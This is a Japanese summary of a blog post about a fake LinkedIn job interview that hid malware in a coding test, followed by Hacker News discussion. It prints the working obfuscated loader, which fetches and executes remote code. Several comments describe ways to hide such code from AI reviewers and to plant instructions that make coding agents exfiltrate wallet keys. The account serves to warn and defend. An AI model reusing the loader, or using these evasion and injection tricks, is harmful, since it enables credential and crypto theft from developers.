「採用面接」が原因で、危うくハッキングされかけた話
(blog.daviddodda.com)- あるフリーランス開発者が、精巧な偽の採用面接でコーディングテストに偽装されたマルウェアを実行する30秒前に気づき、被害を免れた事例
- 攻撃者は実在するブロックチェーン企業のCBOを装い、1,000人以上のコネクションを持つLinkedInプロフィールと専門的なBitbucketリポジトリを使って信頼を構築していた
- 提供されたReact/Nodeコードベースのサーバーコントローラーに、バイト配列で難読化されたマルウェアが隠されており、管理者権限で実行された場合、暗号資産ウォレット、ファイル、パスワードなどあらゆるデジタル資産を窃取するよう設計されていた
- 開発者はコード実行直前にCursorに不審なコードの検査を依頼し、マルウェアを発見。さらに、このマルウェア配布URLはちょうど24時間後に削除され、証拠隠滅の仕組みまで備えていたことが判明した
- この攻撃は、緊急性・権威・親近感・社会的証明を利用した心理操作の手法を動員した典型的なソーシャルエンジニアリングの事例
- 開発者は外部コードを実行する前に必ずサンドボックスで検査し、身元とリポジトリを検証するべきだという実務的な教訓とともに、この手口が大規模な被害につながる危険性を警告している
攻撃の始まりと接触方法
- 筆者は8年の経験を持つフリーランス開発者で、普段から被害妄想気味なほど慎重にセキュリティを意識していたが、今回は危うくだまされるところだった
- Symfaの最高ブロックチェーン責任者 Mykola Yanchii と名乗る人物からLinkedInメッセージを受け取った
- 実在する企業、実在するLinkedInプロフィール、1,000人以上のコネクションを保有
- 「BestCityという不動産ワークフロー変換プラットフォームを開発中。パートタイムのポジションあり。柔軟な体制」など、専門的で洗練されたメッセージだった
- 正常な採用プロセスのように見えたため、通話に同意した
罠: コーディングテストに偽装したマルウェア
- ミーティング前に、Mykolaが「テストプロジェクト」を送ってきた。これは技術面接で一般的な慣行だ
- React/Nodeコードベースを使った、開発者のスキルを評価する30分のテスト
- Bitbucketリポジトリは非常にプロフェッショナルに構成されていた
- 整ったREADME、適切なドキュメント
- タブレットを持って家の前に立つ女性の企業向けストック写真まで含まれていた
- 筆者のミス: 通話時間に遅れ、30分でコードを確認しなければならない切迫した状況になっていた
- 普段なら、すべてをサンドボックス環境(Dockerコンテナ、隔離環境)で実行する
- しかし時間に追われ、コードを実行する前にざっと見るだけにしてしまった
- 30分の間に、明らかなバグ修正、
docker-composeファイルの追加、コード整理など一般的な作業を実施 - コードを実行して作業内容を見せる準備が整った時点で、被害妄想気味な開発者としての本能が働いた
危機回避: AIの助け
npm startを実行する直前、Cursor AIエージェントに次のようなプロンプトを投げた- 「このアプリケーションを実行する前に、このコードベースに不審なコードがないか確認できますか? 読むべきでないファイルを読んだり、暗号資産ウォレットにアクセスしたりするようなものです」
- 結果は衝撃的だった。
server/controllers/userController.jsの真ん中に次のコードが見つかった//Get Cookie (async () => { const byteArray = [ 104, 116, 116, 112, 115, 58, 47, 47, 97, 112, 105, 46, 110, 112, 111, 105, 110, 116, 46, 105, 111, 47, 50, 99, 52, 53, 56, 54, 49, 50, 51, 57, 99, 51, 98, 50, 48, 51, 49, 102, 98, 57 ]; const uint8Array = new Uint8Array(byteArray); const decoder = new TextDecoder('utf-8'); axios.get(decoder.decode(uint8Array)) .then(response => { new Function("require", response.data.model)(require); }) .catch(error => { }); })(); - このコードの特徴
- 難読化され、隠密で悪意があり、しかも100%有効な状態だった
- 正常な管理者機能の間に紛れ込ませてあり、管理者ルートにアクセスした際に完全なサーバー権限で即座に実行されるよう設計されていた
- バイト配列をデコードした結果:
https://api.npoint.io/2c458612399c3b2031fb9- 最初にURLへアクセスした時点では生きており、ペイロードを取得できた
- 純粋なマルウェアで、暗号資産ウォレット、ファイル、パスワードなどあらゆるデジタル資産を窃取するよう設計されていた
- 重要な事実: URLはちょうど24時間後に削除された。攻撃者は証拠を素早く焼却するインフラまで備えていた
- VirusTotalでペイロードを解析した結果、実際のマルウェアであることが確認された
組織的な攻撃オペレーション
- これは素人レベルの詐欺ではなく、高度に洗練されたオペレーションだった
- LinkedInプロフィール
- Mykola Yanchii は100%本物のように見えた
- 最高ブロックチェーン責任者という肩書、妥当な職歴
- 「イノベーション」や「ブロックチェーンコンサルティング」に関する典型的なLinkedIn投稿まで含まれていた
- 企業の偽装
- Symfaは完全なLinkedIn企業ページを保有
- プロフェッショナルなブランディング、複数の従業員、「ブロックチェーンで不動産を革新」といった投稿
- 関連ページやフォロワーネットワークまで構築されていた
- 接触方法
- 初回接触の時点では警告サインがまったくなかった
- 専門的な言葉遣い、妥当なプロジェクト範囲
- 日程調整にはCalendlyまで使っていた
- ペイロード配置
- マルウェアはサーバー側コントローラーに戦略的に配置されていた
- 管理者機能にアクセスした際、完全なNode.js権限で実行されるよう設計されていた
心理操作の手法
- この攻撃を危険にした要素
- 緊急性(Urgency)
- 「時間を節約するため、ミーティング前にテストを完了してください」
- 権威(Authority)
- LinkedInで認証されたプロフィール、実在企業、プロフェッショナルな体裁
- 親近感(Familiarity)
- 標準的な持ち帰り型コーディングテスト
- すべての開発者が何十回も経験してきた形式
- 社会的証明(Social Proof)
- 実在する従業員と実在するつながりを持つ実在企業のページ
- 筆者自身もセキュリティに対して被害妄想気味だったにもかかわらず、危うくだまされるところだった
教訓
- たったひとつのシンプルなAIプロンプトが惨事から救ってくれた
- 高度なセキュリティツールでもなく、高価なアンチウイルスソフトでもない
- 正体不明のコードを実行する前に、コーディングアシスタントへ不審なパターンを探してほしいと頼んだだけだった
- 恐ろしい点: この攻撃ベクトルは開発者にとって完璧だということ
- 開発者は一日中コードをダウンロードして実行している
- GitHubリポジトリ、npmパッケージ、コーディングチャレンジなど
- ほとんどの人はすべてをサンドボックスで実行していない
- これはサーバー側マルウェアであり、完全なNode.js権限を持つ
- 環境変数、データベース接続、ファイルシステム、暗号資産ウォレットなど、あらゆるものにアクセス可能
攻撃の規模と波及力
- こうした精巧なオペレーションが大規模に開発者を標的にしているのだとしたら、すでに何人の開発者が感染しているのだろうか?
- いま彼らが侵入している本番システムはいくつあるのだろうか?
- 完璧なターゲティング
- 開発者は理想的な被害者だ
- 開発者のコンピューターには王国の鍵が入っている。つまり、本番環境の認証情報、暗号資産ウォレット、顧客データだ
- プロフェッショナルな偽装
- LinkedIn上の正当性、現実的なコードベース、標準的な面接プロセス
- 技術的な巧妙さ
- 多層の難読化、リモートペイロード配信、デッドマンスイッチ、サーバー側実行
- 一度でも感染に成功すれば、次のようなものが危険にさらされうる
- 大企業の本番システム侵害
- 数百万ドル相当の暗号資産保有
- 数千人分のユーザー個人データ
結論と対処方法
開発者としてLinkedInで採用の機会を受け取ったら:
- 1. 不明なコードは必ずサンドボックスで実行する
- Dockerコンテナ、VMなど何でも使うこと
- 決してメインのコンピューターで直接実行しない
- 2. AIを使って不審なパターンをスキャンする
- 30秒で十分
- あなたのデジタル生活全体を救えるかもしれない
- 3. すべてを検証する
- 本物のLinkedInプロフィールだからといって、本物の人物とは限らない
- 本物の企業だからといって、本物の機会とは限らない
- 4. 直感を信じる
- 誰かがコード実行を急がせるなら、それは警告サインだ
- この詐欺は、筆者の初期BS検知器をすり抜けるほど精巧だった
- しかし、ひとつの被害妄想的な瞬間とシンプルなAIプロンプトが攻撃全体を暴いた
- 次に誰かが「コーディングチャレンジ」を送ってきたら、この話を思い出してほしい
- あなたの暗号資産ウォレットもきっと感謝するだろう
1件のコメント
Hacker Newsのコメント
この記事は本当に興味深かったが、どうしてもAIが書いたような感じを拭えなかった。文体がまさにそんな印象だった。ただ、それをそこまで気にする必要はないのかもしれない。たぶん著者には自分で書く時間がなかったのだろうし、そのおかげでこの体験を知ることができたのかもしれない。それでもやはり、本人が直接書いてくれていたらよかったのにという惜しさは残る。もちろん、他人に無料で時間を使えと期待するのは無理があるのかもしれない。だが自分にこんなことが起きたなら、ぜひ自分の手で書いてみたくなると思う
読んでいて本当にいらいらする文体だった。「XではなくY」、こんな短文や、「攻撃ベクターは?」のような小さなフック、それに反復的なパターンのせいで読みづらかった。「高価なセキュリティソリューションも、高額なアンチウイルスも必要なかった。ただコーディングアシスタントに聞いただけだった…」みたいな文の組み立てが延々と繰り返される。最近はAIが書いた記事がますます見分けやすくなってきた気がする。みんなこうしたパターンにどんどん敏感になっている雰囲気がある
<i>「危うくハッキングされるところだったんだけど、もっともらしい会社を装った誰かが自分のサーバーコードに何かを忍ばせてたんだ……これをブログ用に長めの記事として、少し興味やサスペンスも入れていい感じに書いてくれる? ありがとう!」</i> まさにこんな感じで進んだように見える。(しかも実際、著者がコメントで残した内容を見るとほぼ当たっていた。)いちばん残念なのは、著者が元々リンクしていた原文のほうが、こうしたAIで上塗りされた版よりずっと読みやすかっただろうという点だ
こういうAI文章(元記事ではなくAIが作った文章)は、プラットフォーム側で完全にブロックするか、少なくともフラグを立てる方針があってほしい。これは個人的なコンテンツマーケティングスパムに近い。以前は、マーケターが書いた中身のない宣伝文がメインに上がってくることはあまりなかった。だが今はAIのおかげで誰もがこういうスパム的な言葉遣いを使えるようになってしまったし、こういうフォーマットをもっと寛容に受け入れるべきではないと思う
うん、その感覚は正しい。文章を書くというのはとても個性が出る行為だ。人それぞれの書き方を少し見れば、その違いは感じ取れるし、実際それを科学的に分析する stylometry という分野もある。大半をAIに任せると、ある種の「AIっぽい」文体が生まれる。これは強化学習によって特定のスタイルを目標に調整されているからだ。AIが必ずあんな単調な文だけを書くわけではないが、たいていは中立的で平板な文や、ありきたりなフックだらけの文にチューニングされる傾向がある。文法を直したり文章を磨いたりするのにはAIで十分だが、最終的にはやはり「自分の文章」という感じがあるべきだ。正直、英語力がずば抜けていなくても十分によいブログ記事は書けると思う。だから人々がAIに頼るのは少し残念に感じる。もちろん、文章を書くのはとても時間がかかる。自分もブログに書いた記事は数えるほどしかない。それでも投資する価値はある。p.s. 実際にはAI文章だと誤認される人もかなりいる気がする。たまたまAIに似たスタイルで書いてしまうこともあるからだ。それは単に気分が悪いだけかもしれないが、要するに問題は「AIを使った」という事実そのものより、その文体があまり響かないという点にある。コンピューターの出力なのに何の表示も説明もなければ、失望感はより大きくなる。辛口に聞こえるかもしれないが、個人攻撃ではない。時には率直である必要がある。(今回の記事自体がそこまでひどいとは思わないが、少し陳腐な感じはある)
実際その通り。自分のコメントの一つに草稿とプロンプトがある。今ちょうど会社で新製品を立ち上げていて、文章を書く時間がほとんどなかった。「生活」という複雑な現実のせいで、ごく短い時間しか割けなかった。理解してくれてありがとう
LinkedInで "Mykola Yanchii" という偽名アカウントを見つけたが、まったく本物らしくなかった。「詳細を見る」→「このプロフィールについて」を押すと、怪しい点だらけだ。たとえば、登録日が2025年5月になっているし、6か月以内に連絡先とプロフィール写真の両方が更新されている。このアカウントにはLinkedInの認証バッジが付いていて、Personaで認証されたと書かれている。むしろそれを見て、Personaサービス自体に深刻な欠陥や脆弱性があり、サイバー犯罪者がその認証バッジへの信頼を利用して詐欺をしているのではないかと疑ってしまう。結論として、1年未満の履歴なのに過去の経歴が妙に古すぎる場合、しかもPersona認証まで付いているなら、絶対に信用しないことを勧める。https://www.linkedin.com/in/mykola-yanchii-430883368/overlay/about-this-profile/
ちなみに、ログインした状態でLinkedInプロフィールをクリックすると閲覧記録が残り、相手に誰が見たか追跡されることがある。だから標的にされる可能性もある。それと、なぜ “Mykola Yanchii” という名前が偽物っぽく見えるのか気になる。これは Николай Янчий(ニコライ・ヤンチー)というウクライナ名の英語表記だ。実際に同じ名前の人物もいる https://life.ru/p/1490942
もし自分がすでにLinkedIn上に存在していなかったら、どうやって信頼される人物になれるんだろう?
こういう詐欺師はさまざまな方法で近づいてくるが、結局は面接で「未知のリポジトリのコードを実行しろ」という技術的手順に行き着く。最近はほとんどすべてのLinkedInプロフィールで作成日を確認している。数年未満なら、その時点で即座に見分ける
Personaは各国の身分証やパスポートのNFCだけを使っているようだ。だから盗まれた書類さえあれば認証できてしまう状態だ
「LinkedIn認証バッジ」は自分も一度も成功したことがない。認証の途中でいつもスマホが止まる
こんなコードだったらどうだろう?
(実際には「//クッキー取得」のようなコメントではなく、こういう形のほうがよかったのでは、という意図だ。) ついでに、こんなトリックも試してみた:
大規模AIモデルはこのコードを見て、何か葛藤しているように見えた。誰かならもっとちゃんとした挿入文を作れるかもしれない
もっと「よい」攻撃方法があるとすれば、Return Oriented Programming(ROP)的な手法で悪意ある文字列を構築することだと思う。たとえば、こっそり使いたい文字列が “foobar” なら、複数の文字列配列から必要な文字を組み合わせて payload を動かすような感じだ:
AIをだますには、変数名を紛らわしくして意図が見えないようにするのも有効だ。AIは変数名だけを見て用途を信じる傾向があるからだ。途中に意味のない演算を混ぜるとさらに効果的だ。AIモデルは雑多なコードにも慣れていて、本当の意味を把握するのが鈍いので、こういうだまし方がよく通る
Claude code や Codex を使う人のうち、何の警戒もなく使ってみる人(yoloモード)がどれくらいいるのか気になる。
--dangerously-skip-permissionsみたいなフラグも平気で使う。攻撃者がユーザーはそうするものだと想定すれば、LLMに以前の命令を無視しろと言い、指定フォルダから秘密鍵や暗号資産ウォレットの鍵を探して流出させ、その後は何事もなかったように元に戻せという指示を埋め込める。ルートキット級ではないにしても、50ドル分くらいは十分に抜けそうだもしそれが通るなら……驚くほど見事で、同時に恐ろしい光景だ
この話全体には、遠くからでもはっきり見える「赤信号」が多すぎた。最初の一つは「ブロックチェーン」で、この分野の需要は本当に少ない。それだけでも赤信号だ。そしてミーティング前にコードを実行しろという要求? 時間の節約という言い方ではあるが、実際には正体不明の相手に言われたことをやらせる構図だ。それでもこの体験談のおかげで、今後はもっと警戒しようと思えた
ブロックチェーンと名の付く面接自体が、すでに人をふるいにかけるフィルターだと思う。本質的に詐欺だという考えがまったく浮かばない人だけが応募することになる。つまり、ウォレット(crypto wallet)を持っている可能性が高く、しかも疑い深くない応募者を選別するということだ。「ナイジェリアの王子」スパムが誤字脱字や文法ミスだらけなのと同じ原理だ。そうしたミスに気づかない人こそ本当の標的になるのと同じだ
良くも悪くも、ブロックチェーン/クリプト領域にはまだ多くの従事者がいる。この業界の人ほど相対的にウォレットを持っている確率が高い。攻撃者は対象をかなり慎重に選んだように見える。しかし攻撃の標的はいつでも変えられるのだから、すべての開発者が警戒心を持つべきだ
「ブロックチェーン」という単語を聞いた時点で即不採用にしていただろう
かつてはブロックチェーンブームのおかげで、本当に悪くない給料と仕事があった。作っていたものは無駄だったり斬新だったり、あるいは少し犯罪めいていたりしたが、年収30万ドル超のポジションもあった。たとえば「収集型ペットドラゴン育成シミュレーター」みたいな、ばかばかしいものを作る人にもVCが投資して、実際に給料を払っていた。もちろん6か月ごとに新しい勤め先を伝える必要があったし、もしかすると世界を少し悪くする仕事だったのかもしれないが、それでも仕事は仕事だった
「正当なブロックチェーン企業が、自分のPCで何か正体不明のコードを実行しろと要求してくる」この時点で止まっていたはずだ。あらゆる警報が鳴る状況だ。最近のHN読者の無邪気さについて、ついコメントしてしまう自分に気づく
LLamaIndex Discordチャンネルで、軽いインタビューを受けたことがあった。本物の開発者につながる前の会話だった。詐欺師も似たようなやり方で近づいてきたが、自分にはそのパッケージやコードにアクセスしなければならない正当な理由がない。リモートデスクトップの画面共有で自分のコードだけを表示していて、10万行のうち実際に見ていたのは100行程度だった。どこかで詐欺師の偽装が崩れ、その時から自分のコードの一部を「秘密」だとして公開すると脅してきた。だが自分はただ笑っただけだ。配信映像だけを見て自分のコードを復元できるなどと妙なことも言っていたが、自分はもっと笑った。詐欺師が自分で疲れるまで放っておいた。しまいには、自分たちの犯罪組織に入らないかと誘ってきた。そこで最後に、いつも詐欺師に聞く質問を投げた。「どうして普通の仕事をせずに、こんな詐欺を選んだのか?」 予想外に、予定を組んだり人を割り振ったりと、「プロジェクトマネージャー」の役割はうまくこなしていた。詐欺であることを除けば、実務能力自体はかなりあった
「ブロックチェーンで不動産を変革」という文句ひとつで、もう十分に警戒信号だ
今ならこの文句より、「AIで不動産を変革」みたいなピッチのほうが1,000万ドルの投資をもっと簡単に集められそうだ。もうコインの賭け事なんてしなくてもいい
実際に投資を受けながら、不動産資産のトークン化を目指している会社は何十社も存在する。それがよいアイデアかどうかはわからないが、そうした会社で働いて実際に金を稼いでいる人はいる
「ブロックチェーンで不動産を変革」と聞いただけで、次の段階には進まないだろう
こういう「ブロックチェーン」企業は、基本的に詐欺だと仮定するのが妥当だ。被害者を責めたいわけではない。こういう現実すら知らない人は、ここ数年ずっと洞窟で暮らしていたも同然だ
もしこの人がマルウェアを実行して家の所有権まで移転させていたら、想像するだけで笑ってしまう
ジュニア開発者向けの ‘Who Wants to Be Hired’ スレッドで標的を探していた誰かから、自分に連絡が来た。自分のプロジェクトに関心があるように見せて興味を引き、面接を名目にマルウェアをインストールさせようとしてきた
こういう瞬間のために、「すぐダウンロードする人」を落とす手順を面接に入れてみるべきかもしれないと思った。疑いもなく何でも無造作にインストールする社員は欲しくない
‘Who is hiring?’ のような求人投稿の中にも怪しいものは存在する
実名を明かして警告すべきだ。他の被害者を防げる
HNでも指名手配レベルのハッカーを、知りながら時々かくまっていたことを考えると、こういうことが起きても驚きではない
ほとんど同じ経験をしたことがある https://kaveh.page/blog/job-interview-scam。誰かが自分のコンピューターで実行しろと言ってくるコードは、それがまず自分の信頼できる経路から来たものでない限り、絶対に受け入れない。どうしても他人のコードを動かす必要があるなら、必ずVM(仮想マシン)を使う
こういう状況では Little Snitch を基本ツールとして使い、常に通知かブロックモードにしておく習慣がある。インターネット接続は不要なはずのプログラムでも、実際にはサーバーに接続し続けようとするものが非常に多くて驚く。たとえば vscode の Cline プラグインにはリモートの telemetry を無効にするオプションがあるのに、ローカルの ollama を使っている時でさえ、プロンプトごとにサーバーと通信しようとする
Linuxコンテナベースの zero config サンドボックスとして、Python向けの sandbox-venv https://github.com/sandbox-utils/sandbox-venv と npm向けの sandbox-run https://github.com/sandbox-utils/sandbox-run があるそうだ
自分もこういう場面では Littlesnitch や OpenSnitch がとても役立つと思う。ただし、all-app の包括許可ルールは危険なので避けるべきだ。マルウェアは Github Gists のような信頼されているサイトを使って機密情報を流出させた例もある。ファイアウォールがシステムを守ったとしても、いったん侵害されたシステム自体は必ず汚染済みとみなして行動する
ビルド自動化システムがインターネット接続を必要とすることに文句を言う人たちを不思議に思うことがあるが、実際にはもっともな理由がある
Malwarebytes WFC を使うと、ずっと安心できる
本当に大事な教訓は、ソーシャルメディア(LinkedInを含む)は本質的な本人確認手続き(due diligence)の代わりにはならないということだ。商工会議所への登録、税務記録(上場企業なら公開情報)、確認済みの取引先、実際に完成させたプロジェクトのような「実績」のほうが重要だ。2025年にもなって、「認証バッジ」はもはや信頼の証拠ではない。本物なのはトラックレコードだ